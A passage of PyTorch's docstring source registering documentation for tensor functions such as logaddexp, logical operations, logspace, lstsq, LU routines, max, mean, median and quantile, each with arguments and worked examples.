tensor([-0.2483, -0.3213, -0.0042, -0.9196, -4.3504])
""".format(**common_args))
add_docstr(torch.logaddexp,
r"""
logaddexp(input, other, *, out=None) -> Tensor
Logarithm of the sum of exponentiations of the inputs.
Calculates pointwise :math:`\log\left(e^x + e^y\right)`. This function is useful
in statistics where the calculated probabilities of events may be so small as to
exceed the range of normal floating point numbers. In such cases the logarithm
of the calculated probability is stored. This function allows adding
probabilities stored in such a fashion.
This op should be disambiguated with :func:`torch.logsumexp` which performs a
reduction on a single tensor.
Args:
{input}
other (Tensor): the second input tensor
Keyword arguments:
{out}
Example::
>>> torch.logaddexp(torch.tensor([-1.0]), torch.tensor([-1.0, -2, -3]))
tensor([-0.3069, -0.6867, -0.8731])
>>> torch.logaddexp(torch.tensor([-100.0, -200, -300]), torch.tensor([-1.0, -2, -3]))
tensor([-1., -2., -3.])
>>> torch.logaddexp(torch.tensor([1.0, 2000, 30000]), torch.tensor([-1.0, -2, -3]))
tensor([1.1269e+00, 2.0000e+03, 3.0000e+04])
""".format(**common_args))
add_docstr(torch.logaddexp2,
r"""
logaddexp2(input, other, *, out=None) -> Tensor
Logarithm of the sum of exponentiations of the inputs in base-2.
Calculates pointwise :math:`\log_2\left(2^x + 2^y\right)`. See
:func:`torch.logaddexp` for more details.
Args:
{input}
other (Tensor): the second input tensor
Keyword arguments:
{out}
""".format(**common_args))
add_docstr(torch.xlogy,
r"""
xlogy(input, other, *, out=None) -> Tensor
Alias for :func:`torch.special.xlogy`.
""")
add_docstr(torch.logical_and,
r"""
logical_and(input, other, *, out=None) -> Tensor
Computes the element-wise logical AND of the given input tensors. Zeros are treated as ``False`` and nonzeros are
treated as ``True``.
Args:
{input}
other (Tensor): the tensor to compute AND with
Keyword args:
{out}
Example::
>>> torch.logical_and(torch.tensor([True, False, True]), torch.tensor([True, False, False]))
tensor([ True, False, False])
>>> a = torch.tensor([0, 1, 10, 0], dtype=torch.int8)
>>> b = torch.tensor([4, 0, 1, 0], dtype=torch.int8)
>>> torch.logical_and(a, b)
tensor([False, False, True, False])
>>> torch.logical_and(a.double(), b.double())
tensor([False, False, True, False])
>>> torch.logical_and(a.double(), b)
tensor([False, False, True, False])
>>> torch.logical_and(a, b, out=torch.empty(4, dtype=torch.bool))
tensor([False, False, True, False])
""".format(**common_args))
add_docstr(torch.logical_not,
r"""
logical_not(input, *, out=None) -> Tensor
Computes the element-wise logical NOT of the given input tensor. If not specified, the output tensor will have the bool
dtype. If the input tensor is not a bool tensor, zeros are treated as ``False`` and non-zeros are treated as ``True``.
Args:
{input}
Keyword args:
{out}
Example::
>>> torch.logical_not(torch.tensor([True, False]))
tensor([False, True])
>>> torch.logical_not(torch.tensor([0, 1, -10], dtype=torch.int8))
tensor([ True, False, False])
>>> torch.logical_not(torch.tensor([0., 1.5, -10.], dtype=torch.double))
tensor([ True, False, False])
>>> torch.logical_not(torch.tensor([0., 1., -10.], dtype=torch.double), out=torch.empty(3, dtype=torch.int16))
tensor([1, 0, 0], dtype=torch.int16)
""".format(**common_args))
add_docstr(torch.logical_or,
r"""
logical_or(input, other, *, out=None) -> Tensor
Computes the element-wise logical OR of the given input tensors. Zeros are treated as ``False`` and nonzeros are
treated as ``True``.
Args:
{input}
other (Tensor): the tensor to compute OR with
Keyword args:
{out}
Example::
>>> torch.logical_or(torch.tensor([True, False, True]), torch.tensor([True, False, False]))
tensor([ True, False, True])
>>> a = torch.tensor([0, 1, 10, 0], dtype=torch.int8)
>>> b = torch.tensor([4, 0, 1, 0], dtype=torch.int8)
>>> torch.logical_or(a, b)
tensor([ True, True, True, False])
>>> torch.logical_or(a.double(), b.double())
tensor([ True, True, True, False])
>>> torch.logical_or(a.double(), b)
tensor([ True, True, True, False])
>>> torch.logical_or(a, b, out=torch.empty(4, dtype=torch.bool))
tensor([ True, True, True, False])
""".format(**common_args))
add_docstr(torch.logical_xor,
r"""
logical_xor(input, other, *, out=None) -> Tensor
Computes the element-wise logical XOR of the given input tensors. Zeros are treated as ``False`` and nonzeros are
treated as ``True``.
Args:
{input}
other (Tensor): the tensor to compute XOR with
Keyword args:
{out}
Example::
>>> torch.logical_xor(torch.tensor([True, False, True]), torch.tensor([True, False, False]))
tensor([False, False, True])
>>> a = torch.tensor([0, 1, 10, 0], dtype=torch.int8)
>>> b = torch.tensor([4, 0, 1, 0], dtype=torch.int8)
>>> torch.logical_xor(a, b)
tensor([ True, True, False, False])
>>> torch.logical_xor(a.double(), b.double())
tensor([ True, True, False, False])
>>> torch.logical_xor(a.double(), b)
tensor([ True, True, False, False])
>>> torch.logical_xor(a, b, out=torch.empty(4, dtype=torch.bool))
tensor([ True, True, False, False])
""".format(**common_args))
add_docstr(torch.logspace, """
logspace(start, end, steps, base=10.0, *, \
out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
""" + r"""
Creates a one-dimensional tensor of size :attr:`steps` whose values are evenly
spaced from :math:`\text{base}^{\text{start}}` to
:math:`\text{base}^{\text{end}}`, inclusive, on a logarithmic scale
with base :attr:`base`. That is, the values are:
.. math::
(\text{base}^{\text{start}},
\text{base}^{(\text{start} + \frac{\text{end} - \text{start}}{ \text{steps} - 1})},
\ldots,
\text{base}^{(\text{start} + (\text{steps} - 2) * \frac{\text{end} - \text{start}}{ \text{steps} - 1})},
\text{base}^{\text{end}})
""" + """
.. warning::
Not providing a value for :attr:`steps` is deprecated. For backwards
compatibility, not providing a value for :attr:`steps` will create a tensor
with 100 elements. Note that this behavior is not reflected in the
documented function signature and should not be relied on. In a future
PyTorch release, failing to provide a value for :attr:`steps` will throw a
runtime error.
Args:
start (float): the starting value for the set of points
end (float): the ending value for the set of points
steps (int): size of the constructed tensor
base (float, optional): base of the logarithm function. Default: ``10.0``.
Keyword arguments:
{out}
dtype (torch.dtype, optional): the data type to perform the computation in.
Default: if None, uses the global default dtype (see torch.get_default_dtype())
when both :attr:`start` and :attr:`end` are real,
and corresponding complex dtype when either is complex.
{layout}
{device}
{requires_grad}
Example::
>>> torch.logspace(start=-10, end=10, steps=5)
tensor([ 1.0000e-10, 1.0000e-05, 1.0000e+00, 1.0000e+05, 1.0000e+10])
>>> torch.logspace(start=0.1, end=1.0, steps=5)
tensor([ 1.2589, 2.1135, 3.5481, 5.9566, 10.0000])
>>> torch.logspace(start=0.1, end=1.0, steps=1)
tensor([1.2589])
>>> torch.logspace(start=2, end=2, steps=1, base=2)
tensor([4.0])
""".format(**factory_common_args))
add_docstr(torch.logsumexp,
r"""
logsumexp(input, dim, keepdim=False, *, out=None)
Returns the log of summed exponentials of each row of the :attr:`input`
tensor in the given dimension :attr:`dim`. The computation is numerically
stabilized.
For summation index :math:`j` given by `dim` and other indices :math:`i`, the result is
.. math::
\text{{logsumexp}}(x)_{{i}} = \log \sum_j \exp(x_{{ij}})
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{out}
Example::
>>> a = torch.randn(3, 3)
>>> torch.logsumexp(a, 1)
tensor([1.4907, 1.0593, 1.5696])
>>> torch.dist(torch.logsumexp(a, 1), torch.log(torch.sum(torch.exp(a), 1)))
tensor(1.6859e-07)
""".format(**multi_dim_common))
add_docstr(torch.lstsq,
r"""
lstsq(input, A, *, out=None) -> (Tensor, Tensor)
Computes the solution to the least squares and least norm problems for a full
rank matrix :math:`A` of size :math:`(m \times n)` and a matrix :math:`B` of
size :math:`(m \times k)`.
If :math:`m \geq n`, :func:`lstsq` solves the least-squares problem:
.. math::
\begin{array}{ll}
\min_X & \|AX-B\|_2.
\end{array}
If :math:`m < n`, :func:`lstsq` solves the least-norm problem:
.. math::
\begin{array}{llll}
\min_X & \|X\|_2 & \text{subject to} & AX = B.
\end{array}
Returned tensor :math:`X` has shape :math:`(\max(m, n) \times k)`. The first :math:`n`
rows of :math:`X` contains the solution. If :math:`m \geq n`, the residual sum of squares
for the solution in each column is given by the sum of squares of elements in the
remaining :math:`m - n` rows of that column.
.. warning::
:func:`torch.lstsq` is deprecated in favor of :func:`torch.linalg.lstsq`
and will be removed in a future PyTorch release. :func:`torch.linalg.lstsq`
has reversed arguments and does not return the QR decomposition in the returned tuple
(it returns other information about the problem).
The returned `solution` in :func:`torch.lstsq` stores the residuals of the solution in the
last `m - n` columns in the case `m > n`. In :func:`torch.linalg.lstsq`, the residuals
are in the field 'residuals' of the returned named tuple.
Unpacking the solution as ``X = torch.lstsq(B, A).solution[:A.size(1)]`` should be replaced with
.. code:: python
X = torch.linalg.lstsq(A, B).solution
.. note::
The case when :math:`m < n` is not supported on the GPU.
Args:
input (Tensor): the matrix :math:`B`
A (Tensor): the :math:`m` by :math:`n` matrix :math:`A`
Keyword args:
out (tuple, optional): the optional destination tensor
Returns:
(Tensor, Tensor): A namedtuple (solution, QR) containing:
- **solution** (*Tensor*): the least squares solution
- **QR** (*Tensor*): the details of the QR factorization
.. note::
The returned matrices will always be transposed, irrespective of the strides
of the input matrices. That is, they will have stride `(1, m)` instead of
`(m, 1)`.
Example::
>>> A = torch.tensor([[1., 1, 1],
... [2, 3, 4],
... [3, 5, 2],
... [4, 2, 5],
... [5, 4, 3]])
>>> B = torch.tensor([[-10., -3],
... [ 12, 14],
... [ 14, 12],
... [ 16, 16],
... [ 18, 16]])
>>> X, _ = torch.lstsq(B, A)
>>> X
tensor([[ 2.0000, 1.0000],
[ 1.0000, 1.0000],
[ 1.0000, 2.0000],
[ 10.9635, 4.8501],
[ 8.9332, 5.2418]])
""")
add_docstr(torch.lt, r"""
lt(input, other, *, out=None) -> Tensor
Computes :math:`\text{input} < \text{other}` element-wise.
""" + r"""
The second argument can be a number or a tensor whose shape is
:ref:`broadcastable <broadcasting-semantics>` with the first argument.
Args:
input (Tensor): the tensor to compare
other (Tensor or float): the tensor or value to compare
Keyword args:
{out}
Returns:
A boolean tensor that is True where :attr:`input` is less than :attr:`other` and False elsewhere
Example::
>>> torch.lt(torch.tensor([[1, 2], [3, 4]]), torch.tensor([[1, 1], [4, 4]]))
tensor([[False, False], [True, False]])
""".format(**common_args))
add_docstr(torch.lu_unpack, r"""
lu_unpack(LU_data, LU_pivots, unpack_data=True, unpack_pivots=True, *, out=None) -> (Tensor, Tensor, Tensor)
Unpacks the data and pivots from an LU factorization of a tensor into tensors ``L`` and ``U`` and a permutation tensor ``P``
such that ``LU_data, LU_pivots = (P @ L @ U).lu()``.
Returns a tuple of tensors as ``(the P tensor (permutation matrix), the L tensor, the U tensor)``.
.. note:: ``P.dtype == LU_data.dtype`` and ``P.dtype`` is not an integer type so that matrix products with ``P``
are possible without casting it to a floating type.
Args:
LU_data (Tensor): the packed LU factorization data
LU_pivots (Tensor): the packed LU factorization pivots
unpack_data (bool): flag indicating if the data should be unpacked.
If ``False``, then the returned ``L`` and ``U`` are ``None``.
Default: ``True``
unpack_pivots (bool): flag indicating if the pivots should be unpacked into a permutation matrix ``P``.
If ``False``, then the returned ``P`` is ``None``.
Default: ``True``
out (tuple, optional): a tuple of three tensors to use for the outputs ``(P, L, U)``.
Examples::
>>> A = torch.randn(2, 3, 3)
>>> A_LU, pivots = A.lu()
>>> P, A_L, A_U = torch.lu_unpack(A_LU, pivots)
>>>
>>> # can recover A from factorization
>>> A_ = torch.bmm(P, torch.bmm(A_L, A_U))
>>> # LU factorization of a rectangular matrix:
>>> A = torch.randn(2, 3, 2)
>>> A_LU, pivots = A.lu()
>>> P, A_L, A_U = torch.lu_unpack(A_LU, pivots)
>>> P
tensor([[[1., 0., 0.],
[0., 1., 0.],
[0., 0., 1.]],
[[0., 0., 1.],
[0., 1., 0.],
[1., 0., 0.]]])
>>> A_L
tensor([[[ 1.0000, 0.0000],
[ 0.4763, 1.0000],
[ 0.3683, 0.1135]],
[[ 1.0000, 0.0000],
[ 0.2957, 1.0000],
[-0.9668, -0.3335]]])
>>> A_U
tensor([[[ 2.1962, 1.0881],
[ 0.0000, -0.8681]],
[[-1.0947, 0.3736],
[ 0.0000, 0.5718]]])
>>> A_ = torch.bmm(P, torch.bmm(A_L, A_U))
>>> torch.norm(A_ - A)
tensor(2.9802e-08)
""".format(**common_args))
add_docstr(torch.less, r"""
less(input, other, *, out=None) -> Tensor
Alias for :func:`torch.lt`.
""")
add_docstr(torch.lu_solve,
r"""
lu_solve(b, LU_data, LU_pivots, *, out=None) -> Tensor
Returns the LU solve of the linear system :math:`Ax = b` using the partially pivoted
LU factorization of A from :meth:`torch.lu`.
This function supports ``float``, ``double``, ``cfloat`` and ``cdouble`` dtypes for :attr:`input`.
Arguments:
b (Tensor): the RHS tensor of size :math:`(*, m, k)`, where :math:`*`
is zero or more batch dimensions.
LU_data (Tensor): the pivoted LU factorization of A from :meth:`torch.lu` of size :math:`(*, m, m)`,
where :math:`*` is zero or more batch dimensions.
LU_pivots (IntTensor): the pivots of the LU factorization from :meth:`torch.lu` of size :math:`(*, m)`,
where :math:`*` is zero or more batch dimensions.
The batch dimensions of :attr:`LU_pivots` must be equal to the batch dimensions of
:attr:`LU_data`.
Keyword args:
{out}
Example::
>>> A = torch.randn(2, 3, 3)
>>> b = torch.randn(2, 3, 1)
>>> A_LU = torch.lu(A)
>>> x = torch.lu_solve(b, *A_LU)
>>> torch.norm(torch.bmm(A, x) - b)
tensor(1.00000e-07 *
2.8312)
""".format(**common_args))
add_docstr(torch.masked_select,
r"""
masked_select(input, mask, *, out=None) -> Tensor
Returns a new 1-D tensor which indexes the :attr:`input` tensor according to
the boolean mask :attr:`mask` which is a `BoolTensor`.
The shapes of the :attr:`mask` tensor and the :attr:`input` tensor don't need
to match, but they must be :ref:`broadcastable <broadcasting-semantics>`.
.. note:: The returned tensor does **not** use the same storage
as the original tensor
Args:
{input}
mask (BoolTensor): the tensor containing the binary mask to index with
Keyword args:
{out}
Example::
>>> x = torch.randn(3, 4)
>>> x
tensor([[ 0.3552, -2.3825, -0.8297, 0.3477],
[-1.2035, 1.2252, 0.5002, 0.6248],
[ 0.1307, -2.0608, 0.1244, 2.0139]])
>>> mask = x.ge(0.5)
>>> mask
tensor([[False, False, False, False],
[False, True, True, True],
[False, False, False, True]])
>>> torch.masked_select(x, mask)
tensor([ 1.2252, 0.5002, 0.6248, 2.0139])
""".format(**common_args))
add_docstr(torch.matrix_rank, r"""
matrix_rank(input, tol=None, symmetric=False, *, out=None) -> Tensor
Returns the numerical rank of a 2-D tensor. The method to compute the
matrix rank is done using SVD by default. If :attr:`symmetric` is ``True``,
then :attr:`input` is assumed to be symmetric, and the computation of the
rank is done by obtaining the eigenvalues.
:attr:`tol` is the threshold below which the singular values (or the eigenvalues
when :attr:`symmetric` is ``True``) are considered to be 0. If :attr:`tol` is not
specified, :attr:`tol` is set to ``S.max() * max(S.size()) * eps`` where `S` is the
singular values (or the eigenvalues when :attr:`symmetric` is ``True``), and ``eps``
is the epsilon value for the datatype of :attr:`input`.
.. warning::
:func:`torch.matrix_rank` is deprecated in favor of :func:`torch.linalg.matrix_rank`
and will be removed in a future PyTorch release. The parameter :attr:`symmetric` was
renamed in :func:`torch.linalg.matrix_rank` to :attr:`hermitian`.
Args:
input (Tensor): the input 2-D tensor
tol (float, optional): the tolerance value. Default: ``None``
symmetric(bool, optional): indicates whether :attr:`input` is symmetric.
Default: ``False``
Keyword args:
{out}
Example::
>>> a = torch.eye(10)
>>> torch.matrix_rank(a)
tensor(10)
>>> b = torch.eye(10)
>>> b[0, 0] = 0
>>> torch.matrix_rank(b)
tensor(9)
""".format(**common_args))
add_docstr(torch.matrix_power, r"""
matrix_power(input, n, *, out=None) -> Tensor
Alias for :func:`torch.linalg.matrix_power`
""")
add_docstr(torch.matrix_exp, r"""
matrix_exp(A) -> Tensor
Alias for :func:`torch.linalg.matrix_exp`.
""")
add_docstr(torch.max,
r"""
max(input) -> Tensor
Returns the maximum value of all elements in the ``input`` tensor.
.. warning::
This function produces deterministic (sub)gradients unlike ``max(dim=0)``
Args:
{input}
Example::
>>> a = torch.randn(1, 3)
>>> a
tensor([[ 0.6763, 0.7445, -2.2369]])
>>> torch.max(a)
tensor(0.7445)
.. function:: max(input, dim, keepdim=False, *, out=None) -> (Tensor, LongTensor)
:noindex:
Returns a namedtuple ``(values, indices)`` where ``values`` is the maximum
value of each row of the :attr:`input` tensor in the given dimension
:attr:`dim`. And ``indices`` is the index location of each maximum value found
(argmax).
If ``keepdim`` is ``True``, the output tensors are of the same size
as ``input`` except in the dimension ``dim`` where they are of size 1.
Otherwise, ``dim`` is squeezed (see :func:`torch.squeeze`), resulting
in the output tensors having 1 fewer dimension than ``input``.
.. note:: If there are multiple maximal values in a reduced row then
the indices of the first maximal value are returned.
Args:
{input}
{dim}
{keepdim} Default: ``False``.
Keyword args:
out (tuple, optional): the result tuple of two output tensors (max, max_indices)
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[-1.2360, -0.2942, -0.1222, 0.8475],
[ 1.1949, -1.1127, -2.2379, -0.6702],
[ 1.5717, -0.9207, 0.1297, -1.8768],
[-0.6172, 1.0036, -0.6060, -0.2432]])
>>> torch.max(a, 1)
torch.return_types.max(values=tensor([0.8475, 1.1949, 1.5717, 1.0036]), indices=tensor([3, 0, 0, 1]))
.. function:: max(input, other, *, out=None) -> Tensor
:noindex:
See :func:`torch.maximum`.
""".format(**single_dim_common))
add_docstr(torch.maximum, r"""
maximum(input, other, *, out=None) -> Tensor
Computes the element-wise maximum of :attr:`input` and :attr:`other`.
.. note::
If one of the elements being compared is a NaN, then that element is returned.
:func:`maximum` is not supported for tensors with complex dtypes.
Args:
{input}
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> a = torch.tensor((1, 2, -1))
>>> b = torch.tensor((3, 0, 4))
>>> torch.maximum(a, b)
tensor([3, 2, 4])
""".format(**common_args))
add_docstr(torch.fmax, r"""
fmax(input, other, *, out=None) -> Tensor
Computes the element-wise maximum of :attr:`input` and :attr:`other`.
This is like :func:`torch.maximum` except it handles NaNs differently:
if exactly one of the two elements being compared is a NaN then the non-NaN element is taken as the maximum.
Only if both elements are NaN is NaN propagated.
This function is a wrapper around C++'s ``std::fmax`` and is similar to NumPy's ``fmax`` function.
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer and floating-point inputs.
Args:
{input}
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> a = torch.tensor([9.7, float('nan'), 3.1, float('nan')])
>>> b = torch.tensor([-2.2, 0.5, float('nan'), float('nan')])
>>> torch.fmax(a, b)
tensor([9.7000, 0.5000, 3.1000, nan])
""".format(**common_args))
add_docstr(torch.amax,
r"""
amax(input, dim, keepdim=False, *, out=None) -> Tensor
Returns the maximum value of each slice of the :attr:`input` tensor in the given
dimension(s) :attr:`dim`.
.. note::
The difference between ``max``/``min`` and ``amax``/``amin`` is:
- ``amax``/``amin`` supports reducing on multiple dimensions,
- ``amax``/``amin`` does not return indices,
- ``amax``/``amin`` evenly distributes gradient between equal values,
while ``max(dim)``/``min(dim)`` propagates gradient only to a single
index in the source tensor.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{out}
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 0.8177, 1.4878, -0.2491, 0.9130],
[-0.7158, 1.1775, 2.0992, 0.4817],
[-0.0053, 0.0164, -1.3738, -0.0507],
[ 1.9700, 1.1106, -1.0318, -1.0816]])
>>> torch.amax(a, 1)
tensor([1.4878, 2.0992, 0.0164, 1.9700])
""".format(**multi_dim_common))
add_docstr(torch.argmax,
r"""
argmax(input) -> LongTensor
Returns the indices of the maximum value of all elements in the :attr:`input` tensor.
This is the second value returned by :meth:`torch.max`. See its
documentation for the exact semantics of this method.
.. note:: If there are multiple maximal values then the indices of the first maximal value are returned.
Args:
{input}
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 1.3398, 0.2663, -0.2686, 0.2450],
[-0.7401, -0.8805, -0.3402, -1.1936],
[ 0.4907, -1.3948, -1.0691, -0.3132],
[-1.6092, 0.5419, -0.2993, 0.3195]])
>>> torch.argmax(a)
tensor(0)
.. function:: argmax(input, dim, keepdim=False) -> LongTensor
:noindex:
Returns the indices of the maximum values of a tensor across a dimension.
This is the second value returned by :meth:`torch.max`. See its
documentation for the exact semantics of this method.
Args:
{input}
{dim} If ``None``, the argmax of the flattened input is returned.
{keepdim} Ignored if ``dim=None``.
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 1.3398, 0.2663, -0.2686, 0.2450],
[-0.7401, -0.8805, -0.3402, -1.1936],
[ 0.4907, -1.3948, -1.0691, -0.3132],
[-1.6092, 0.5419, -0.2993, 0.3195]])
>>> torch.argmax(a, dim=1)
tensor([ 0, 2, 0, 1])
""".format(**single_dim_common))
add_docstr(torch.argwhere,
r"""
argwhere(input) -> Tensor
Returns a tensor containing the indices of all non-zero elements of
:attr:`input`. Each row in the result contains the indices of a non-zero
element in :attr:`input`. The result is sorted lexicographically, with
the last index changing the fastest (C-style).
If :attr:`input` has :math:`n` dimensions, then the resulting indices tensor
:attr:`out` is of size :math:`(z \times n)`, where :math:`z` is the total number of
non-zero elements in the :attr:`input` tensor.
.. note::
This function is similar to NumPy's `argwhere`.
When :attr:`input` is on CUDA, this function causes host-device synchronization.
Args:
{input}
Example::
>>> t = torch.tensor([1, 0, 1])
>>> torch.argwhere(t)
tensor([[0],
[2]])
>>> t = torch.tensor([[1, 0, 1], [0, 1, 1]])
>>> torch.argwhere(t)
tensor([[0, 0],
[0, 2],
[1, 1],
[1, 2]])
""")
add_docstr(torch.mean, r"""
mean(input, *, dtype=None) -> Tensor
Returns the mean value of all elements in the :attr:`input` tensor.
Args:
{input}
Keyword args:
{dtype}
Example::
>>> a = torch.randn(1, 3)
>>> a
tensor([[ 0.2294, -0.5481, 1.3288]])
>>> torch.mean(a)
tensor(0.3367)
.. function:: mean(input, dim, keepdim=False, *, dtype=None, out=None) -> Tensor
:noindex:
Returns the mean value of each row of the :attr:`input` tensor in the given
dimension :attr:`dim`. If :attr:`dim` is a list of dimensions,
reduce over all of them.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{dtype}
{out}
.. seealso::
:func:`torch.nanmean` computes the mean value of `non-NaN` elements.
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[-0.3841, 0.6320, 0.4254, -0.7384],
[-0.9644, 1.0131, -0.6549, -1.4279],
[-0.2951, -1.3350, -0.7694, 0.5600],
[ 1.0842, -0.9580, 0.3623, 0.2343]])
>>> torch.mean(a, 1)
tensor([-0.0163, -0.5085, -0.4599, 0.1807])
>>> torch.mean(a, 1, True)
tensor([[-0.0163],
[-0.5085],
[-0.4599],
[ 0.1807]])
""".format(**multi_dim_common))
add_docstr(torch.nanmean, r"""
nanmean(input, dim=None, keepdim=False, *, dtype=None, out=None) -> Tensor
Computes the mean of all `non-NaN` elements along the specified dimensions.
This function is identical to :func:`torch.mean` when there are no `NaN` values
in the :attr:`input` tensor. In the presence of `NaN`, :func:`torch.mean` will
propagate the `NaN` to the output whereas :func:`torch.nanmean` will ignore the
`NaN` values (`torch.nanmean(a)` is equivalent to `torch.mean(a[~a.isnan()])`).
{keepdim_details}
Args:
{input}
{dim} If `None`, reduces all dimensions. Default is `None`.
{keepdim}
Keyword args:
{dtype}
{out}
.. seealso::
:func:`torch.mean` computes the mean value, propagating `NaN`.
Example::
>>> x = torch.tensor([[torch.nan, 1, 2], [1, 2, 3]])
>>> x.mean()
tensor(nan)
>>> x.nanmean()
tensor(1.8000)
>>> x.mean(dim=0)
tensor([ nan, 1.5000, 2.5000])
>>> x.nanmean(dim=0)
tensor([1.0000, 1.5000, 2.5000])
# If all elements in the reduced dimensions are NaN then the result is NaN
>>> torch.tensor([torch.nan]).nanmean()
tensor(nan)
""".format(**multi_dim_common))
add_docstr(torch.median,
r"""
median(input) -> Tensor
Returns the median of the values in :attr:`input`.
.. note::
The median is not unique for :attr:`input` tensors with an even number
of elements. In this case the lower of the two medians is returned. To
compute the mean of both medians, use :func:`torch.quantile` with ``q=0.5`` instead.
.. warning::
This function produces deterministic (sub)gradients unlike ``median(dim=0)``
Args:
{input}
Example::
>>> a = torch.randn(1, 3)
>>> a
tensor([[ 1.5219, -1.5212, 0.2202]])
>>> torch.median(a)
tensor(0.2202)
.. function:: median(input, dim=-1, keepdim=False, *, out=None) -> (Tensor, LongTensor)
:noindex:
Returns a namedtuple ``(values, indices)`` where ``values`` contains the median of each row of :attr:`input`
in the dimension :attr:`dim`, and ``indices`` contains the index of the median values found in the dimension :attr:`dim`.
By default, :attr:`dim` is the last dimension of the :attr:`input` tensor.
If :attr:`keepdim` is ``True``, the output tensors are of the same size
as :attr:`input` except in the dimension :attr:`dim` where they are of size 1.
Otherwise, :attr:`dim` is squeezed (see :func:`torch.squeeze`), resulting in
the outputs tensor having 1 fewer dimension than :attr:`input`.
.. note::
The median is not unique for :attr:`input` tensors with an even number
of elements in the dimension :attr:`dim`. In this case the lower of the
two medians is returned. To compute the mean of both medians in
:attr:`input`, use :func:`torch.quantile` with ``q=0.5`` instead.
.. warning::
``indices`` does not necessarily contain the first occurrence of each
median value found, unless it is unique.
The exact implementation details are device-specific.
Do not expect the same result when run on CPU and GPU in general.
For the same reason do not expect the gradients to be deterministic.
Args:
{input}
{dim}
{keepdim}
Keyword args:
out ((Tensor, Tensor), optional): The first tensor will be populated with the median values and the second
tensor, which must have dtype long, with their indices in the dimension
:attr:`dim` of :attr:`input`.
Example::
>>> a = torch.randn(4, 5)
>>> a
tensor([[ 0.2505, -0.3982, -0.9948, 0.3518, -1.3131],
[ 0.3180, -0.6993, 1.0436, 0.0438, 0.2270],
[-0.2751, 0.7303, 0.2192, 0.3321, 0.2488],
[ 1.0778, -1.9510, 0.7048, 0.4742, -0.7125]])
>>> torch.median(a, 1)
torch.return_types.median(values=tensor([-0.3982, 0.2270, 0.2488, 0.4742]), indices=tensor([1, 4, 4, 3]))
""".format(**single_dim_common))
add_docstr(torch.nanmedian,
r"""
nanmedian(input) -> Tensor
Returns the median of the values in :attr:`input`, ignoring ``NaN`` values.
This function is identical to :func:`torch.median` when there are no ``NaN`` values in :attr:`input`.
When :attr:`input` has one or more ``NaN`` values, :func:`torch.median` will always return ``NaN``,
while this function will return the median of the non-``NaN`` elements in :attr:`input`.
If all the elements in :attr:`input` are ``NaN`` it will also return ``NaN``.
Args:
{input}
Example::
>>> a = torch.tensor([1, float('nan'), 3, 2])
>>> a.median()
tensor(nan)
>>> a.nanmedian()
tensor(2.)
.. function:: nanmedian(input, dim=-1, keepdim=False, *, out=None) -> (Tensor, LongTensor)
:noindex:
Returns a namedtuple ``(values, indices)`` where ``values`` contains the median of each row of :attr:`input`
in the dimension :attr:`dim`, ignoring ``NaN`` values, and ``indices`` contains the index of the median values
found in the dimension :attr:`dim`.
This function is identical to :func:`torch.median` when there are no ``NaN`` values in a reduced row. When a reduced row has
one or more ``NaN`` values, :func:`torch.median` will always reduce it to ``NaN``, while this function will reduce it to the
median of the non-``NaN`` elements. If all the elements in a reduced row are ``NaN`` then it will be reduced to ``NaN``, too.
Args:
{input}
{dim}
{keepdim}
Keyword args:
out ((Tensor, Tensor), optional): The first tensor will be populated with the median values and the second
tensor, which must have dtype long, with their indices in the dimension
:attr:`dim` of :attr:`input`.
Example::
>>> a = torch.tensor([[2, 3, 1], [float('nan'), 1, float('nan')]])
>>> a
tensor([[2., 3., 1.],
[nan, 1., nan]])
>>> a.median(0)
torch.return_types.median(values=tensor([nan, 1., nan]), indices=tensor([1, 1, 1]))
>>> a.nanmedian(0)
torch.return_types.nanmedian(values=tensor([2., 1., 1.]), indices=tensor([0, 1, 0]))
""".format(**single_dim_common))
add_docstr(torch.quantile, r"""
quantile(input, q, dim=None, keepdim=False, *, interpolation='linear', out=None) -> Tensor
Computes the q-th quantiles of each row of the :attr:`input` tensor along the dimension :attr:`dim`.
To compute the quantile, we map q in [0, 1] to the range of indices [0, n - 1] to find the location
of the quantile in the sorted input. If the quantile lies between two data points ``a < b`` with
indices ``i`` and ``j`` in the sorted order, result is computed according to the given
:attr:`interpolation` method as follows:
- ``linear``: ``a + (b - a) * fraction``, where ``fraction`` is the fractional part of the computed quantile index.
- ``lower``: ``a``.
- ``higher``: ``b``.
- ``nearest``: ``a`` or ``b``, whichever's index is closer to the computed quantile index (rounding down for .5 fractions).
- ``midpoint``: ``(a + b) / 2``.
If :attr:`q` is a 1D tensor, the first dimension of the output represents the quantiles and has size
equal to the size of :attr:`q`, the remaining dimensions are what remains from the reduction.
.. note::
By default :attr:`dim` is ``None`` resulting in the :attr:`input` tensor being flattened before computation.
Args:
{input}
q (float or Tensor): a scalar or 1D tensor of values in the range [0, 1].
{dim}
{keepdim}
Keyword arguments:
interpolation (string): interpolation method to use when the desired quantile lies between two data points.
Can be ``linear``, ``lower``, ``higher``, ``midpoint`` and ``nearest``.
Default is ``linear``.
{out}
Example::
>>> a = torch.randn(2, 3)
>>> a
tensor([[ 0.0795, -1.2117, 0.9765],
[ 1.1707, 0.6706, 0.4884]])
>>> q = torch.tensor([0.25, 0.5, 0.75])
>>> torch.quantile(a, q, dim=1, keepdim=True)
tensor([[[-0.5661],
[ 0.5795]],
[[ 0.0795],
[ 0.6706]],
[[ 0.5280],
[ 0.9206]]])
>>> torch.quantile(a, q, dim=1, keepdim=True).shape
torch.Size([3, 2, 1])
>>> a = torch.arange(4.)
>>> a
tensor([0., 1., 2., 3.])
>>> torch.quantile(a, 0.6, interpolation='linear')
tensor(1.8000)
>>> torch.quantile(a, 0.6, interpolation='lower')
tensor(1.)
>>> torch.quantile(a, 0.6, interpolation='higher')
tensor(2.)
>>> torch.quantile(a, 0.6, interpolation='midpoint')
tensor(1.5000)
>>> torch.quantile(a, 0.6, interpolation='nearest')
tensor(2.)
